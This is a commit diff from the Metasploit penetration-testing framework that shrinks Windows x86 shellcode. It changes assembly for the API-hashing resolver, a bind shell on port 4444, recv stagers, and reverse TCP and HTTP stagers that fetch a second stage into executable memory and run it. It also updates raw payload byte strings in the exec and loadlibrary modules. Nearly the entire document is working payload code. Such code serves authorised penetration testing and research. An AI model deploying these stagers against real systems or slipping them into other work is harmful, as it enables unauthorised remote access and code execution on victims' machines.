Shrinks windows payloads, lands rapid7#4391

Author: HD Moore

external/source/shellcode/windows/x86/src/block/block_api.asm

@@ -2,7 +2,7 @@
 ; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
 ; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
 ; Version: 1.0 (24 July 2009)
-; Size: 137 bytes
+; Size: 130 bytes
 ;-----------------------------------------------------------------------------;
 
 [BITS 32]
@@ -17,16 +17,15 @@
 api_call:
   pushad                 ; We preserve all the registers for the caller, bar EAX and ECX.
   mov ebp, esp           ; Create a new stack frame
-  xor edx, edx           ; Zero EDX
-  mov edx, [fs:edx+48]   ; Get a pointer to the PEB
+  xor eax, eax           ; Zero EAX (upper 3 bytes will remain zero until function is found)
+  mov edx, [fs:eax+48]   ; Get a pointer to the PEB
   mov edx, [edx+12]      ; Get PEB->Ldr
   mov edx, [edx+20]      ; Get the first module from the InMemoryOrder module list
 next_mod:                ;
   mov esi, [edx+40]      ; Get pointer to modules name (unicode string)
   movzx ecx, word [edx+38] ; Set ECX to the length we want to check
   xor edi, edi           ; Clear EDI which will store the hash of the module name
 loop_modname:            ;
-  xor eax, eax           ; Clear EAX
   lodsb                  ; Read in the next byte of the name
   cmp al, 'a'            ; Some versions of Windows use lower case module names
   jl not_lowercase       ;
@@ -41,10 +40,10 @@ not_lowercase:           ;
   push edi               ; Save the current module hash for later
   ; Proceed to iterate the export address table,
   mov edx, [edx+16]      ; Get this modules base address
-  mov eax, [edx+60]      ; Get PE header
+  mov ecx, [edx+60]      ; Get PE header
 
   ; use ecx as our EAT pointer here so we can take advantage of jecxz.
-  mov ecx, [eax+edx+120] ; Get the EAT from the PE header
+  mov ecx, [ecx+edx+120] ; Get the EAT from the PE header
   jecxz get_next_mod1    ; If no EAT present, process the next module
   add ecx, edx           ; Add the modules base address
   push ecx               ; Save the current modules EAT
@@ -62,7 +61,6 @@ get_next_func:           ;
   xor edi, edi           ; Clear EDI which will store the hash of the function name
   ; And compare it to the one we want
 loop_funcname:           ;
-  xor eax, eax           ; Clear EAX
   lodsb                  ; Read in the next byte of the ASCII function name
   ror edi, 13            ; Rotate right our hash value
   add edi, eax           ; Add the next byte of the name
@@ -94,7 +92,7 @@ finish:
   ; We now automagically return to the correct caller...
 
 get_next_mod:            ;
-  pop eax                ; Pop off the current (now the previous) modules EAT
+  pop edi                ; Pop off the current (now the previous) modules EAT
 get_next_mod1:           ;
   pop edi                ; Pop off the current (now the previous) modules hash
   pop edx                ; Restore our position in the module list

external/source/shellcode/windows/x86/src/block/block_bind_tcp.asm

@@ -23,10 +23,16 @@ bind_tcp:
   push 0x006B8029        ; hash( "ws2_32.dll", "WSAStartup" )
   call ebp               ; WSAStartup( 0x0190, &WSAData );
   
-  push eax               ; if we succeed, eax wil be zero, push zero for the flags param.
-  push eax               ; push null for reserved parameter
-  push eax               ; we do not specify a WSAPROTOCOL_INFO structure
-  push eax               ; we do not specify a protocol
+  push byte 8
+  pop ecx
+push_8_loop:
+  push eax               ; if we succeed, eax will be zero, push it 8 times for later ([1]-[8])
+  loop push_8_loop
+
+                         ; push zero for the flags param [8]
+                         ; push null for reserved parameter [7]
+                         ; we do not specify a WSAPROTOCOL_INFO structure [6]
+                         ; we do not specify a protocol [5]
   inc eax                ;
   push eax               ; push SOCK_STREAM
   inc eax                ;
@@ -35,8 +41,7 @@ bind_tcp:
   call ebp               ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
   xchg edi, eax          ; save the socket for later, don't care about the value of eax after this
   
-  xor ebx, ebx           ; Clear EBX
-  push ebx               ; bind to 0.0.0.0
+                         ; bind to 0.0.0.0, pushed earlier [4]
   push 0x5C110002        ; family AF_INET and port 4444
   mov esi, esp           ; save a pointer to sockaddr_in struct
   push byte 16           ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused)
@@ -45,13 +50,13 @@ bind_tcp:
   push 0x6737DBC2        ; hash( "ws2_32.dll", "bind" )
   call ebp               ; bind( s, &sockaddr_in, 16 );
 
-  push ebx               ; backlog
+                         ; backlog, pushed earlier [3]
   push edi               ; socket
   push 0xFF38E9B7        ; hash( "ws2_32.dll", "listen" )
   call ebp               ; listen( s, 0 );
 
-  push ebx               ; we set length for the sockaddr struct to zero
-  push ebx               ; we dont set the optional sockaddr param
+                         ; we set length for the sockaddr struct to zero, pushed earlier [2]
+                         ; we dont set the optional sockaddr param, pushed earlier [1]
   push edi               ; listening socket
   push 0xE13BEC74        ; hash( "ws2_32.dll", "accept" )
   call ebp               ; accept( s, 0, 0 );

external/source/shellcode/windows/x86/src/block/block_recv.asm

@@ -38,7 +38,6 @@ read_more:               ;
   push 0x5FC8D902        ; hash( "ws2_32.dll", "recv" )
   call ebp               ; recv( s, buffer, length, 0 );
   add ebx, eax           ; buffer += bytes_received
-  sub esi, eax           ; length -= bytes_received
-  test esi, esi          ; test length
+  sub esi, eax           ; length -= bytes_received, will set flags
   jnz read_more          ; continue if we have more to read
   ret                    ; return into the second stage

external/source/shellcode/windows/x86/src/block/block_recv_rc4.asm

@@ -48,8 +48,7 @@ read_more:               ;
   push 0x5FC8D902        ; hash( "ws2_32.dll", "recv" )
   call ebp               ; recv( s, buffer, length, 0 );
   add ebx, eax           ; buffer += bytes_received
-  sub esi, eax           ; length -= bytes_received
-  test esi, esi          ; test length
+  sub esi, eax           ; length -= bytes_received, will set flags
   jnz read_more          ; continue if we have more to read
     pop ebx              ; address of S-box
     pop ecx              ; stage length

external/source/shellcode/windows/x86/src/block/block_reverse_http.asm

@@ -35,48 +35,52 @@ load_wininet:
   push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
   call ebp               ; LoadLibraryA( "wininet" )
 
-  xor ebx,ebx
+set_retry:
+  push byte 8           ; retry 8 times should be enough
+  pop edi
+  xor ebx, ebx           ; push 8 zeros ([1]-[8])
+  mov ecx, edi
+push_zeros:
+  push ebx
+  loop push_zeros
 
 internetopen:
-  push ebx               ; DWORD dwFlags
-  push ebx               ; LPCTSTR lpszProxyBypass (NULL)
-  push ebx               ; LPCTSTR lpszProxyName (NULL)
-  push ebx               ; DWORD dwAccessType (PRECONFIG = 0)
-  push ebx               ; LPCTSTR lpszAgent (NULL)
+                         ; DWORD dwFlags [1]
+                         ; LPCTSTR lpszProxyBypass (NULL) [2]
+                         ; LPCTSTR lpszProxyName (NULL) [3]
+                         ; DWORD dwAccessType (PRECONFIG = 0) [4]
+                         ; LPCTSTR lpszAgent (NULL) [5]
   push 0xA779563A        ; hash( "wininet.dll", "InternetOpenA" )
   call ebp
 
 internetconnect:
-  push ebx               ; DWORD_PTR dwContext (NULL)
-  push ebx               ; dwFlags
+                         ; DWORD_PTR dwContext (NULL) [6]
+                         ; dwFlags [7]
   push byte 3            ; DWORD dwService (INTERNET_SERVICE_HTTP)
   push ebx               ; password (NULL)
   push ebx               ; username (NULL)
   push dword 4444        ; PORT
-  jmp short dbl_get_server_host ; push pointer to HOSTNAME
+  call got_server_uri    ; double call to get pointer for both server_uri and
+server_uri:              ;  server_host; server_uri is saved in EDI for later
+  db "/12345", 0x00
 got_server_host:
   push eax               ; HINTERNET hInternet
   push 0xC69F8957        ; hash( "wininet.dll", "InternetConnectA" )
   call ebp
 
 httpopenrequest:
-  push ebx               ; dwContext (NULL)
+                         ; dwContext (NULL) [8]
   push HTTP_OPEN_FLAGS   ; dwFlags
   push ebx               ; accept types
   push ebx               ; referrer
   push ebx               ; version
-  jmp get_server_uri     ; push pointer to url
-got_server_uri:
+  push edi               ; server URI
   push ebx               ; method
   push eax               ; hConnection
   push 0x3B2E55EB        ; hash( "wininet.dll", "HttpOpenRequestA" )
   call ebp
   xchg esi, eax          ; save hHttpRequest in esi
 
-set_retry:
-  push byte 0x10
-  pop edi
-
 send_request:
 
 %ifdef ENABLE_SSL
@@ -120,15 +124,6 @@ failure:
   push 0x56A2B5F0        ; hardcoded to exitprocess for size
   call ebp
 
-dbl_get_server_host:
-  jmp get_server_host
-
-get_server_uri:
-  call got_server_uri
-
-server_uri:
- db "/12345", 0x00
-
 allocate_memory:
   push byte 0x40         ; PAGE_EXECUTE_READWRITE
   push 0x1000            ; MEM_COMMIT
@@ -164,7 +159,8 @@ download_more:
 execute_stage:
   ret                    ; dive into the stored stage address
 
-get_server_host:
+got_server_uri:
+  pop edi
   call got_server_host
 
 server_host:

external/source/shellcode/windows/x86/src/block/block_reverse_tcp_allports.asm

@@ -51,10 +51,9 @@ try_connect:
   jz short connected
 
 port_bump:
-  xor eax, eax
   mov word ax, [esi+2]
   xchg ah,al
-  inc ax
+  inc eax
   xchg ah,al
   mov word [esi+2], ax
   jmp short try_connect

external/source/shellcode/windows/x86/src/block/block_reverse_tcp_dns.asm

@@ -36,7 +36,10 @@ reverse_tcp:
   xchg edi, eax          ; save the socket for later, don't care about the value of eax after this
 
 get_address:
-  jmp get_hostname
+  call got_hostname
+
+hostname:
+  db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX", 0x00
 
 got_hostname:
   push 0x803428A9        ; hash( "ws2_32.dll", "gethostbyname" )
@@ -66,12 +69,6 @@ handle_failure:
 failure:
   push 0x56A2B5F0        ; hardcoded to exitprocess for size
   call ebp
-
-get_hostname:
-  call got_hostname
-
-hostname:
-  db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX", 0x00
 
 connected:
 

lib/msf/core/payload/windows/exec.rb

@@ -29,21 +29,21 @@ def initialize(info = {})
         {
           'Offsets' =>
             {
-              'EXITFUNC' => [ 161, 'V' ]
+              'EXITFUNC' => [ 154, 'V' ]
             },
           'Payload' =>
-            "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
-            "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
-            "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
-            "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
-            "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
-            "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
-            "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
-            "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
-            "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
-            "\x6A\x01\x8D\x85\xB9\x00\x00\x00\x50\x68\x31\x8B\x6F\x87\xFF\xD5" +
-            "\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A" +
-            "\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
+            "\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" +
+            "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" +
+            "\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" +
+            "\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" +
+            "\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" +
+            "\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" +
+            "\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" +
+            "\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" +
+            "\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x6A\x01\x8D\x85\xB2\x00\x00" +
+            "\x00\x50\x68\x31\x8B\x6F\x87\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x68\xA6" +
+            "\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47" +
+            "\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
         }
       ))
 

lib/msf/core/payload/windows/loadlibrary.rb

@@ -29,21 +29,21 @@ def initialize(info = {})
         {
           'Offsets' =>
             {
-              'EXITFUNC' => [ 159, 'V' ]
+              'EXITFUNC' => [ 152, 'V' ]
             },
           'Payload' =>
-            "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
-            "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
-            "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
-            "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
-            "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
-            "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
-            "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
-            "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
-            "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
-            "\x8D\x85\xB7\x00\x00\x00\x50\x68\x4C\x77\x26\x07\xFF\xD5\xBB\xE0" +
-            "\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB" +
-            "\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
+            "\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" +
+            "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" +
+            "\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" +
+            "\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" +
+            "\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" +
+            "\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" +
+            "\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" +
+            "\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" +
+            "\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x8D\x85\xB0\x00\x00\x00\x50" +
+            "\x68\x4C\x77\x26\x07\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD" +
+            "\x9D\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72" +
+            "\x6F\x6A\x00\x53\xFF\xD5"
         }
       ))
 

lib/msf/core/payload/windows/prepend_migrate.rb

@@ -68,16 +68,15 @@ def prepend_migrate(buf)
     api_call:
       pushad                    ; We preserve all the registers for the caller, bar EAX and ECX.
       mov ebp, esp              ; Create a new stack frame
-      xor edx, edx              ; Zero EDX
-      mov edx, [fs:edx+48]      ; Get a pointer to the PEB
+      xor eax, eax              ; Zero EAX (upper 3 bytes will remain zero until function is found)
+      mov edx, [fs:eax+48]      ; Get a pointer to the PEB
       mov edx, [edx+12]         ; Get PEB->Ldr
       mov edx, [edx+20]         ; Get the first module from the InMemoryOrder module list
     next_mod:                   ;
       mov esi, [edx+40]         ; Get pointer to modules name (unicode string)
       movzx ecx, word [edx+38]  ; Set ECX to the length we want to check
       xor edi, edi              ; Clear EDI which will store the hash of the module name
     loop_modname:               ;
-      xor eax, eax              ; Clear EAX
       lodsb                     ; Read in the next byte of the name
       cmp al, 'a'               ; Some versions of Windows use lower case module names
       jl not_lowercase          ;
@@ -92,10 +91,10 @@ def prepend_migrate(buf)
       push edi                  ; Save the current module hash for later
       ; Proceed to iterate the export address table
       mov edx, [edx+16]         ; Get this modules base address
-      mov eax, [edx+60]         ; Get PE header
+      mov ecx, [edx+60]         ; Get PE header
 
       ; use ecx as our EAT pointer here so we can take advantage of jecxz.
-      mov ecx, [eax+edx+120]    ; Get the EAT from the PE header
+      mov ecx, [ecx+edx+120]    ; Get the EAT from the PE header
       jecxz get_next_mod1       ; If no EAT present, process the next module
       add ecx, edx              ; Add the modules base address
       push ecx                  ; Save the current modules EAT
@@ -113,7 +112,6 @@ def prepend_migrate(buf)
       xor edi, edi              ; Clear EDI which will store the hash of the function name
       ; And compare it to the one we want
     loop_funcname:              ;
-      xor eax, eax              ; Clear EAX
       lodsb                     ; Read in the next byte of the ASCII function name
       ror edi, 13               ; Rotate right our hash value
       add edi, eax              ; Add the next byte of the name
@@ -145,7 +143,7 @@ def prepend_migrate(buf)
       ; We now automagically return to the correct caller...
 
     get_next_mod:               ;
-      pop eax                   ; Pop off the current (now the previous) modules EAT
+      pop edi                   ; Pop off the current (now the previous) modules EAT
     get_next_mod1:              ;
       pop edi                   ; Pop off the current (now the previous) modules hash
       pop edx                   ; Restore our position in the module list